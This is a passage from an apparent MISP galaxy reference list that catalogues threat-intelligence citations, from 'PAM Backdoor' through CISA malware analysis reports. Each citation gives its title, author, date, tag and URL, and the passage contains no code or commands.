The tag is: misp-galaxy:references="PAM Backdoor"

Table 14245. Table References

Links

https://github.com/zephrax/linux-pam-backdoor

Linux Password and Shadow File Formats

The Linux Documentation Project. (n.d.). Linux Password and Shadow File Formats. Retrieved February 19, 2020.

The tag is: misp-galaxy:references="Linux Password and Shadow File Formats"

Table 14246. Table References

Links

https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html

nixCraft - John the Ripper

Vivek Gite. (2014, September 17). Linux Password Cracking: Explain unshadow and john Commands (John the Ripper Tool). Retrieved February 19, 2020.

The tag is: misp-galaxy:references="nixCraft - John the Ripper"

Table 14247. Table References

Links

https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/

Polop Linux PrivEsc Gitbook

Carlos Polop. (2023, March 5). Linux Privilege Escalation. Retrieved March 31, 2023.

The tag is: misp-galaxy:references="Polop Linux PrivEsc Gitbook"

Table 14248. Table References

Links

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#proc-usdpid-maps-and-proc-usdpid-mem

setuid man page

Michael Kerrisk. (2017, September 15). Linux Programmer’s Manual. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="setuid man page"

Table 14249. Table References

Links

http://man7.org/linux/man-pages/man2/setuid.2.html

Man LD.SO

Kerrisk, M. (2020, June 13). Linux Programmer’s Manual. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="Man LD.SO"

Table 14250. Table References

Links

https://www.man7.org/linux/man-pages/man8/ld.so.8.html

Uninformed Needle

skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Uninformed Needle"

Table 14251. Table References

Links

http://hick.org/code/skape/papers/needle.txt

List Blobs

Microsoft. (n.d.). List Blobs. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="List Blobs"

Table 14252. Table References

Links

https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs

ListObjectsV2

Amazon. (n.d.). ListObjectsV2. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="ListObjectsV2"

Table 14253. Table References

Links

https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjectsV2.html

Wikipedia File Header Signatures

Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.

The tag is: misp-galaxy:references="Wikipedia File Header Signatures"

Table 14254. Table References

Links

https://en.wikipedia.org/wiki/List_of_file_signatures

Wikipedia OSI

Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Wikipedia OSI"

Table 14255. Table References

Links

http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29

AWS List Roles

Amazon. (n.d.). List Roles. Retrieved August 11, 2020.

The tag is: misp-galaxy:references="AWS List Roles"

Table 14256. Table References

Links

https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html

Google Cloud Secrets

Google Cloud. (n.d.). List secrets and view secret details. Retrieved September 25, 2023.

The tag is: misp-galaxy:references="Google Cloud Secrets"

Table 14257. Table References

Links

https://cloud.google.com/secret-manager/docs/view-secret-details

Peripheral Discovery Linux

Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.

The tag is: misp-galaxy:references="Peripheral Discovery Linux"

Table 14258. Table References

Links

https://linuxhint.com/list-usb-devices-linux/

AWS List Users

Amazon. (n.d.). List Users. Retrieved August 11, 2020.

The tag is: misp-galaxy:references="AWS List Users"

Table 14259. Table References

Links

https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html

Sophos PowerShell command audit

jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.

The tag is: misp-galaxy:references="Sophos PowerShell command audit"

Table 14260. Table References

Links

https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit

Dell TG-1314

Dell SecureWorks Counter Threat Unit Special Operations Team. (2015, May 28). Living off the Land. Retrieved January 26, 2016.

The tag is: misp-galaxy:references="Dell TG-1314"

Table 14261. Table References

Links

http://www.secureworks.com/resources/blog/living-off-the-land/

Symantec Living off the Land

Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018.

The tag is: misp-galaxy:references="Symantec Living off the Land"

Table 14262. Table References

Links

https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf

LOLBAS Main Site

LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.

The tag is: misp-galaxy:references="LOLBAS Main Site"

Table 14263. Table References

Links

https://lolbas-project.github.io/

LOLBAS Project

Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.

The tag is: misp-galaxy:references="LOLBAS Project"

Table 14264. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS#criteria

FireEye 2019 Apple Remote Desktop

Jake Nicastro, Willi Ballenthin. (2019, October 9). Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil. Retrieved August 16, 2021.

The tag is: misp-galaxy:references="FireEye 2019 Apple Remote Desktop"

Table 14265. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html

LKM loading kernel restrictions

Pingios, A. (2018, February 7). LKM loading kernel restrictions. Retrieved June 4, 2020.

The tag is: misp-galaxy:references="LKM loading kernel restrictions"

Table 14266. Table References

Links

https://xorl.wordpress.com/2018/02/17/lkm-loading-kernel-restrictions/

Rapid7 LLMNR Spoofer

Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="Rapid7 LLMNR Spoofer"

Table 14267. Table References

Links

https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response

Wikipedia Loadable Kernel Module

Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Wikipedia Loadable Kernel Module"

Table 14268. Table References

Links

https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux

Microsoft LoadLibrary

Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft LoadLibrary"

Table 14269. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya

Microsoft Local Accounts Feb 2019

Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019.

The tag is: misp-galaxy:references="Microsoft Local Accounts Feb 2019"

Table 14270. Table References

Links

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts

Sternsecurity LLMNR-NBTNS

Sternstein, J. (2013, November). Local Network Attacks: LLMNR and NBT-NS Poisoning. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="Sternsecurity LLMNR-NBTNS"

Table 14271. Table References

Links

https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning

Sophos Geolocation 2016

Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals target you based on where you live. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Sophos Geolocation 2016"

Table 14272. Table References

Links

https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/

VMWare LockBit 3.0 October 2022

Dana Behling. (2022, October 15). LockBit 3.0 Ransomware Unlocked. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="VMWare LockBit 3.0 October 2022"

Table 14273. Table References

Links

https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html

Sentinel Labs LockBit 3.0 July 2022

Jim Walter, Aleksandar Milenkoski. (2022, July 21). LockBit 3.0 Update | Unpicking the Ransomware’s Latest Anti-Analysis and Evasion Techniques. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="Sentinel Labs LockBit 3.0 July 2022"

Table 14274. Table References

Links

https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/

Cary Esentutl

Cary, M. (2018, December 6). Locked File Access Using ESENTUTL.exe. Retrieved September 5, 2019.

The tag is: misp-galaxy:references="Cary Esentutl"

Table 14275. Table References

Links

https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/

Group IB Ransomware September 2020

Group IB. (2020, September). LOCK LIKE A PRO. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Group IB Ransomware September 2020"

Table 14276. Table References

Links

https://groupib.pathfactory.com/ransomware-reports/prolock_wp

AWS Cloud Trail Backup API

Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail. Retrieved April 27, 2020.

The tag is: misp-galaxy:references="AWS Cloud Trail Backup API"

Table 14277. Table References

Links

https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html

AWS Logging IAM Calls

AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="AWS Logging IAM Calls"

Table 14278. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html

Login Items AE

Apple. (n.d.). Login Items AE. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Login Items AE"

Table 14279. Table References

Links

https://developer.apple.com/library/archive/samplecode/LoginItemsAE/Introduction/Intro.html#//apple_ref/doc/uid/DTS10003788

LoginWindowScripts Apple Dev

Apple. (n.d.). LoginWindowScripts. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="LoginWindowScripts Apple Dev"

Table 14280. Table References

Links

https://developer.apple.com/documentation/devicemanagement/loginwindowscripts

LogMeIn Homepage

LogMeIn. (n.d.). LogMeIn Homepage. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="LogMeIn Homepage"

Table 14281. Table References

Links

https://www.logmein.com/

ESET LoJax Sept 2018

ESET. (2018, September). LOJAX: First UEFI rootkit found in the wild, courtesy of the Sednit group. Retrieved July 2, 2019.

The tag is: misp-galaxy:references="ESET LoJax Sept 2018"

Table 14282. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf

Morphisec Lokibot April 2020

Cheruku, H. (2020, April 15). LOKIBOT WITH AUTOIT OBFUSCATOR + FRENCHY SHELLCODE. Retrieved May 14, 2020.

The tag is: misp-galaxy:references="Morphisec Lokibot April 2020"

Table 14283. Table References

Links

https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode

t1105_lolbas

LOLBAS. (n.d.). LOLBAS Mapped to T1105. Retrieved March 11, 2022.

The tag is: misp-galaxy:references="t1105_lolbas"

Table 14284. Table References

Links

https://lolbas-project.github.io/#t1105

Qualys LolZarus

Pradhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022.

The tag is: misp-galaxy:references="Qualys LolZarus"

Table 14285. Table References

Links

https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns

Bitdefender Trickbot C2 infra Nov 2020

Liviu Arsene, Radu Tudorica. (2020, November 23). TrickBot is Dead. Long Live TrickBot! Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Bitdefender Trickbot C2 infra Nov 2020"

Table 14286. Table References

Links

https://www.bitdefender.com/blog/labs/trickbot-is-dead-long-live-trickbot/

Proofpoint LookBack Malware Aug 2019

Raggi, M., Schwarz, D. (2019, August 1). LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021.

The tag is: misp-galaxy:references="Proofpoint LookBack Malware Aug 2019"

Table 14287. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks

Fidelis DarkComet

Fidelis Cybersecurity. (2015, August 4). Looking at the Sky for a DarkComet. Retrieved April 5, 2016.

The tag is: misp-galaxy:references="Fidelis DarkComet"

Table 14288. Table References

Links

https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf

BlackHat Process Doppelgänging Dec 2017

Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelgänging. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="BlackHat Process Doppelgänging Dec 2017"

Table 14289. Table References

Links

https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf

ESET LoudMiner June 2019

Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020.

The tag is: misp-galaxy:references="ESET LoudMiner June 2019"

Table 14290. Table References

Links

https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/

GitHub Mimikatz Issue 92 June 2017

Warren, J. (2017, June 22). lsadump::changentlm and lsadump::setntlm work, but generate Windows events #92. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="GitHub Mimikatz Issue 92 June 2017"

Table 14291. Table References

Links

https://github.com/gentilkiwi/mimikatz/issues/92

lsmod man

Kerrisk, M. (2022, December 18). lsmod(8) — Linux manual page. Retrieved March 28, 2023.

The tag is: misp-galaxy:references="lsmod man"

Table 14292. Table References

Links

https://man7.org/linux/man-pages/man8/lsmod.8.html

Unit 42 Lucifer June 2020

Hsu, K. et al. (2020, June 24). Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices. Retrieved November 16, 2020.

The tag is: misp-galaxy:references="Unit 42 Lucifer June 2020"

Table 14293. Table References

Links

https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/

Securelist LuckyMouse June 2018

Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.

The tag is: misp-galaxy:references="Securelist LuckyMouse June 2018"

Table 14294. Table References

Links

https://securelist.com/luckymouse-hits-national-data-center/86083/

lucr-3: Getting SaaS-y in the cloud

Ian Ahl. (2023, September 20). LUCR-3: Scattered Spider Getting SaaS-y In The Cloud. Retrieved September 20, 2023.

The tag is: misp-galaxy:references="lucr-3: Getting SaaS-y in the cloud"

Table 14295. Table References

Links

https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud

Permiso Scattered Spider 2023

Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.

The tag is: misp-galaxy:references="Permiso Scattered Spider 2023"

Table 14296. Table References

Links

https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud

Kaspersky LuminousMoth July 2021

Lechtik, M., et al. (2021, July 14). LuminousMoth APT: Sweeping attacks for the chosen few. Retrieved October 20, 2022.

The tag is: misp-galaxy:references="Kaspersky LuminousMoth July 2021"

Table 14297. Table References

Links

https://securelist.com/apt-luminousmoth/103332/

Bitdefender LuminousMoth July 2021

Botezatu, B., et al. (2021, July 21). LuminousMoth - PlugX, File Exfiltration and Persistence Revisited. Retrieved October 20, 2022.

The tag is: misp-galaxy:references="Bitdefender LuminousMoth July 2021"

Table 14298. Table References

Links

https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited

Unit42 Luna Moth

Kristopher Russo. (n.d.). Luna Moth Callback Phishing Campaign. Retrieved February 2, 2023.

The tag is: misp-galaxy:references="Unit42 Luna Moth"

Table 14299. Table References

Links

https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/

sygnia Luna Month

Oren Biderman, Tomer Lahiyani, Noam Lifshitz, Ori Porag. (n.d.). LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS. Retrieved February 2, 2023.

The tag is: misp-galaxy:references="sygnia Luna Month"

Table 14300. Table References

Links

https://blog.sygnia.co/luna-moth-false-subscription-scams

Zscaler Lyceum DnsSystem June 2022

Shivtarkar, N. and Kumar, A. (2022, June 9). Lyceum .NET DNS Backdoor. Retrieved June 23, 2022.

The tag is: misp-galaxy:references="Zscaler Lyceum DnsSystem June 2022"

Table 14301. Table References

Links

https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor

Kaspersky Lyceum October 2021

Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.

The tag is: misp-galaxy:references="Kaspersky Lyceum October 2021"

Table 14302. Table References

Links

https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf

CoinTicker 2019

Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="CoinTicker 2019"

Table 14303. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/

ESET Machete July 2019

ESET. (2019, July). MACHETE JUST GOT SHARPER: Venezuelan government institutions under attack. Retrieved September 13, 2019.

The tag is: misp-galaxy:references="ESET Machete July 2019"

Table 14304. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf

synack 2016 review

Patrick Wardle. (2017, January 1). Mac Malware of 2016. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="synack 2016 review"

Table 14305. Table References

Links

https://www.synack.com/2017/01/01/mac-malware-2016/

objsee mac malware 2017

Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="objsee mac malware 2017"

Table 14306. Table References

Links

https://objective-see.com/blog/blog_0x25.html

Unit42 CookieMiner Jan 2019

Chen, Y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved July 22, 2020.

The tag is: misp-galaxy:references="Unit42 CookieMiner Jan 2019"

Table 14307. Table References

Links

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

Unit 42 Mac Crypto Cookies January 2019

Chen, Y., Hu, W., Xu, Z., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.

The tag is: misp-galaxy:references="Unit 42 Mac Crypto Cookies January 2019"

Table 14308. Table References

Links

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

MacKeeper Bundlore Apr 2019

Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.

The tag is: misp-galaxy:references="MacKeeper Bundlore Apr 2019"

Table 14309. Table References

Links

https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/

MalwareUnicorn macOS Dylib Injection MachO

Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="MalwareUnicorn macOS Dylib Injection MachO"

Table 14310. Table References

Links

https://malwareunicorn.org/workshops/macos_dylib_injection.html#5

macOS Hierarchical File System Overview

Tenon. (n.d.). Retrieved October 12, 2021.

The tag is: misp-galaxy:references="macOS Hierarchical File System Overview"

Table 14311. Table References

Links

http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553

Add List Remove Login Items Apple Script

kaloprominat. (2013, July 30). macos: manage add list remove login items apple script. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="Add List Remove Login Items Apple Script"

Table 14312. Table References

Links

https://gist.github.com/kaloprominat/6111584

macOS MS office sandbox escape

Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump. Retrieved August 20, 2021.

The tag is: misp-galaxy:references="macOS MS office sandbox escape"

Table 14313. Table References

Links

https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a

MDSec macOS JXA and VSCode

Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans with VSCode Extensions. Retrieved April 20, 2021.

The tag is: misp-galaxy:references="MDSec macOS JXA and VSCode"

Table 14314. Table References

Links

https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/

SentinelOne macOS Red Team

Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020.

The tag is: misp-galaxy:references="SentinelOne macOS Red Team"

Table 14315. Table References

Links

https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/

Lockboxx ARD 2019

Dan Borges. (2019, July 21). MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol). Retrieved September 10, 2021.

The tag is: misp-galaxy:references="Lockboxx ARD 2019"

Table 14316. Table References

Links

http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html

nixCraft macOS PATH variables

Vivek Gite. (2023, August 22). MacOS – Set / Change $PATH Variable Command. Retrieved September 28, 2023.

The tag is: misp-galaxy:references="nixCraft macOS PATH variables"

Table 14317. Table References

Links

https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/

SensePost MacroLess DDE Oct 2017

Stalmans, E., El-Sherei, S. (2017, October 9). Macro-less Code Exec in MSWord. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="SensePost MacroLess DDE Oct 2017"

Table 14318. Table References

Links

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

Macro Malware Targets Macs

Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.

The tag is: misp-galaxy:references="Macro Malware Targets Macs"

Table 14319. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/

alientvault macspy

PETER EWANE. (2017, June 9). MacSpy: OS X RAT as a Service. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="alientvault macspy"

Table 14320. Table References

Links

https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service

reed thiefquest ransomware analysis

Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021.

The tag is: misp-galaxy:references="reed thiefquest ransomware analysis"

Table 14321. Table References

Links

https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/

Reed thiefquest fake ransom

Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 18, 2021.

The tag is: misp-galaxy:references="Reed thiefquest fake ransom"

Table 14322. Table References

Links

https://blog.malwarebytes.com/detections/osx-thiefquest/

Objective See Green Lambert for OSX Oct 2021

Sandvik, Runa. (2021, October 1). Made In America: Green Lambert for OS X. Retrieved March 21, 2022.

The tag is: misp-galaxy:references="Objective See Green Lambert for OSX Oct 2021"

Table 14323. Table References

Links

https://objective-see.com/blog/blog_0x68.html

Trend Micro FIN6 October 2019

Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020.

The tag is: misp-galaxy:references="Trend Micro FIN6 October 2019"

Table 14324. Table References

Links

https://www.trendmicro.com/en_us/research/19/j/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops.html

Unit 42 Magic Hound Feb 2017

Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.

The tag is: misp-galaxy:references="Unit 42 Magic Hound Feb 2017"

Table 14325. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/

AMD Magic Packet

AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021.

The tag is: misp-galaxy:references="AMD Magic Packet"

Table 14326. Table References

Links

https://www.amd.com/system/files/TechDocs/20213.pdf

MagicWeb

Microsoft Threat Intelligence Center, Microsoft Detection and Response Team, Microsoft 365 Defender Research Team. (2022, August 24). MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="MagicWeb"

Table 14327. Table References

Links

https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/

FireEye FIN7 Oct 2019

Carr, N., et al. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques. Retrieved October 11, 2019.

The tag is: misp-galaxy:references="FireEye FIN7 Oct 2019"

Table 14328. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html

Microsoft Mail Flow Rules 2023

Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="Microsoft Mail Flow Rules 2023"

Table 14329. Table References

Links

https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules

GitHub MailSniper

Bullock, B. (2018, November 20). MailSniper. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="GitHub MailSniper"

Table 14330. Table References

Links

https://github.com/dafthack/MailSniper

mailx man page

Michael Kerrisk. (2021, August 27). mailx(1p) — Linux manual page. Retrieved June 10, 2022.

The tag is: misp-galaxy:references="mailx man page"

Table 14331. Table References

Links

https://man7.org/linux/man-pages/man1/mailx.1p.html

enigma0x3 normal.dotm

Nelson, M. (2014, January 23). Maintaining Access with normal.dotm. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="enigma0x3 normal.dotm"

Table 14332. Table References

Links

https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/

NetSPI Startup Stored Procedures

Sutherland, S. (2016, March 7). Maintaining Persistence via SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.

The tag is: misp-galaxy:references="NetSPI Startup Stored Procedures"

Table 14333. Table References

Links

https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/

Makecab.exe - LOLBAS Project

LOLBAS. (2018, May 25). Makecab.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Makecab.exe - LOLBAS Project"

Table 14334. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Makecab/

Infoblox Lokibot January 2019

Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020.

The tag is: misp-galaxy:references="Infoblox Lokibot January 2019"

Table 14335. Table References

Links

https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22

U.S. CISA PaperCut May 2023

Cybersecurity and Infrastructure Security Agency. (2023, May 11). Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG. Retrieved May 17, 2023.

The tag is: misp-galaxy:references="U.S. CISA PaperCut May 2023"

Table 14336. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a

GoBotKR

Zuzana Hromcová. (2019, July 8). Malicious campaign targets South Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.

The tag is: misp-galaxy:references="GoBotKR"

Table 14337. Table References

Links

https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/

ICEBRG Chrome Extensions

De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.

The tag is: misp-galaxy:references="ICEBRG Chrome Extensions"

Table 14338. Table References

Links

https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses

McAfee Malicious Doc Targets Pyeongchang Olympics

Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.

The tag is: misp-galaxy:references="McAfee Malicious Doc Targets Pyeongchang Olympics"

Table 14339. Table References

Links

https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/

Fortinet Fareit

Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.

The tag is: misp-galaxy:references="Fortinet Fareit"

Table 14340. Table References

Links

https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware

Microsoft OAuth Spam 2022

Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="Microsoft OAuth Spam 2022"

Table 14341. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/

Zscaler Kasidet

Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="Zscaler Kasidet"

Table 14342. Table References

Links

http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html

SilentBreak Outlook Rules

Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved February 4, 2019.

The tag is: misp-galaxy:references="SilentBreak Outlook Rules"

Table 14343. Table References

Links

https://silentbreaksecurity.com/malicious-outlook-rules/

Webroot PHP 2011

Brandt, Andrew. (2011, February 22). Malicious PHP Scripts on the Rise. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="Webroot PHP 2011"

Table 14344. Table References

Links

https://www.webroot.com/blog/2011/02/22/malicious-php-scripts-on-the-rise/

CISA ComRAT Oct 2020

CISA. (2020, October 29). Malware Analysis Report (AR20-303A). Retrieved December 9, 2020.

The tag is: misp-galaxy:references="CISA ComRAT Oct 2020"

Table 14345. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a

Malware Analysis Report ComRAT

CISA. (2020, October 29). Malware Analysis Report (AR20-303A) MAR-10310246-2.v1 – PowerShell Script: ComRAT. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Malware Analysis Report ComRAT"

Table 14346. Table References

Links

https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a

CISA Zebrocy Oct 2020

CISA. (2020, October 29). Malware Analysis Report (AR20-303B). Retrieved December 9, 2020.

